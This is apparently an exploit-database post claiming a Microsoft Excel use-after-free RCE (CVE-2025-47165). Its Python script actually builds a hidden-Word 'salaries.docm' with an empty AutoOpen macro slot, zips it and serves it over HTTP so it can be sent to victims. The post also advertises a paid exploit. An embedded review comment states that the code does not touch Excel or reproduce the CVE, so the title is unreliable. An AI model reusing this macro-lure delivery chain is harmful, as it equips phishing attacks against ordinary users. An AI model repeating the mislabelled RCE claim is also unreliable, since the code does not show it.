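# Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/24/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
# CVE: CVE-2025-47165
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise
# Description:
# The attacker can trick any user into opening and executing their code by
# sending a malicious DOCM file via email or a streaming server. After the
# execution of the victim, his machine can be infected or even worse than ever;
# this could be the end of his Windows machine!
# WARNING: AMPUTATE THE MACROS OPTIONS FROM YOUR OFFICE 365!!!
#
# NOTE(review): the title and CVE field name an Excel use-after-free, but the
# code below only automates Word to save a .docm whose AutoOpen macro is an
# empty placeholder, zips it, and serves the working directory over HTTP.
# Nothing in this listing touches Excel or triggers memory corruption, so it
# does not reproduce CVE-2025-47165; it shows a generic macro-document
# delivery chain. What applies to that chain is the vendor update referenced
# above and Office's policy of blocking macros in files obtained from the
# internet.
# Artefacts this script leaves when run: a hidden Word instance started
# through COM automation, salaries.docm and salaries.zip in the working
# directory, and a listener on TCP port 8000.

#!/usr/bin/python
import os
import sys
import http.server
import socketserver
import socket
import threading
import zipfile

PORT = 8000
DOCM_FILENAME = "salaries.docm"
ZIP_FILENAME = "salaries.zip"
DIRECTORY = "."


def create_docm_with_macro(filename=DOCM_FILENAME):
    """Save a macro-enabled Word document containing a placeholder AutoOpen macro.

    Word is driven through COM. Reading ``doc.VBProject`` only works when
    Word's "Trust access to the VBA project object model" setting is enabled;
    otherwise the COM call fails and the error is reported below.
    ``FileFormat=13`` is wdFormatXMLDocumentMacroEnabled (.docm).

    Args:
        filename: Output path; resolved to an absolute path before saving.

    Returns:
        True when the document was saved, False when any step inside Word
        failed (the error is printed, not raised).
    """
    # Imported here instead of at module level: pywin32 is Windows-only, and a
    # top-level import fails on other platforms before the os.name check in
    # the __main__ block can print its message.
    import pythoncom
    from win32com.client import Dispatch

    pythoncom.CoInitialize()
    try:
        word = Dispatch("Word.Application")
        word.Visible = False
        # doc stays None until Documents.Add() succeeds, so the cleanup below
        # never touches an unbound name.
        doc = None
        created = False
        try:
            doc = word.Documents.Add()
            vb_project = doc.VBProject
            vb_component = vb_project.VBComponents("ThisDocument")
            # Placeholder text only; it carries no payload.
            macro_code = '''
Sub AutoOpen()
//YOUR EXPLOIT HERE
// All OF YPU PLEASE WATCH THE DEMO VIDEO
// Best Regards to packetstorm.news and OFFSEC
End Sub
'''
            vb_component.CodeModule.AddFromString(macro_code)
            doc.SaveAs(os.path.abspath(filename), FileFormat=13)
            print(f"[+] Macro-enabled Word document created: {filename}")
            created = True
        except Exception as e:
            print(f"[!] Error creating document: {e}")
        finally:
            # Always shut the hidden Word instance down, even if closing the
            # document itself raises.
            try:
                if doc is not None:
                    doc.Close(False)
            finally:
                word.Quit()
    finally:
        pythoncom.CoUninitialize()
    return created


def zip_docm(docm_path, zip_path):
    """Write *docm_path* into a new deflate-compressed ZIP at *zip_path*.

    The archive member is stored under the file's base name only, so no
    directory components from *docm_path* end up inside the archive.
    """
    with zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED) as zipf:
        zipf.write(docm_path, arcname=os.path.basename(docm_path))
    print(f"[+] Created ZIP archive: {zip_path}")


def get_local_ip():
    """Return the local IPv4 address of the default outbound interface.

    connect() on a UDP socket sends no packet; it only makes the OS choose
    the source address it would use to reach 8.8.8.8. Falls back to
    "127.0.0.1" when no route is available.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        try:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
        except OSError:
            return "127.0.0.1"


class Handler(http.server.SimpleHTTPRequestHandler):
    """Static file handler rooted at DIRECTORY."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, directory=DIRECTORY, **kwargs)


def run_server():
    """Serve DIRECTORY over HTTP on PORT until the process exits.

    NOTE(review): the empty host string binds every interface, and
    SimpleHTTPRequestHandler serves every file under DIRECTORY (the current
    working directory) without authentication, so anything else stored there
    is readable by any host that can reach the port.
    """
    ip = get_local_ip()
    print(f"[+] Starting HTTP server on http://{ip}:{PORT}")
    print("[+] Place your macro docm and zip files in this directory to serve them.")
    print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}")
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        print("[+] Server running, press Ctrl+C to stop")
        httpd.serve_forever()


if __name__ == "__main__":
    if os.name != "nt":
        print("[!] This script only runs on Windows with MS Word installed.")
        sys.exit(1)
    print("[*] Creating the macro-enabled document...")
    # Stop here when Word could not produce the file; zipping a missing file
    # would only raise FileNotFoundError one step later.
    if not create_docm_with_macro(DOCM_FILENAME):
        sys.exit(1)
    print("[*] Creating ZIP archive of the document...")
    zip_docm(DOCM_FILENAME, ZIP_FILENAME)
    print("[*] Starting HTTP server in background thread...")
    server_thread = threading.Thread(target=run_server, daemon=True)
    server_thread.start()
    try:
        # Wait with a timeout instead of spinning on `pass`: this keeps the
        # main thread responsive to Ctrl+C without pinning a CPU core, and it
        # ends if the server thread dies (for example, port already in use).
        while server_thread.is_alive():
            server_thread.join(timeout=0.5)
    except KeyboardInterrupt:
        print("\n[!] Server stopped by user.")

# Reproduce:
# [href](https://www.youtube.com/watch?v=CSb76-OG-Tg)
#
# Buy an exploit only:
# [href](https://satoshidisk.com/pay/COiBVA)
#
# Time spent:
# 01:37:00
#
# --
# System Administrator - Infrastructure Engineer
# Penetration Testing Engineer
# Exploit developer at https://packetstormsecurity.com/
# https://cve.mitre.org/index.html
# https://cxsecurity.com/ and https://www.exploit-db.com/
# 0day Exploit DataBase https://0day.today/
# home page: https://www.nu11secur1ty.com/
# hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
# nu11secur1ty
#
# --
# System Administrator - Infrastructure Engineer
# Penetration Testing Engineer
# Exploit developer at https://packetstorm.news/
# https://cve.mitre.org/index.html
# https://cxsecurity.com/ and https://www.exploit-db.com/
# 0day Exploit DataBase https://0day.today/
# home page: https://www.nu11secur1ty.com/
# hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
# nu11secur1ty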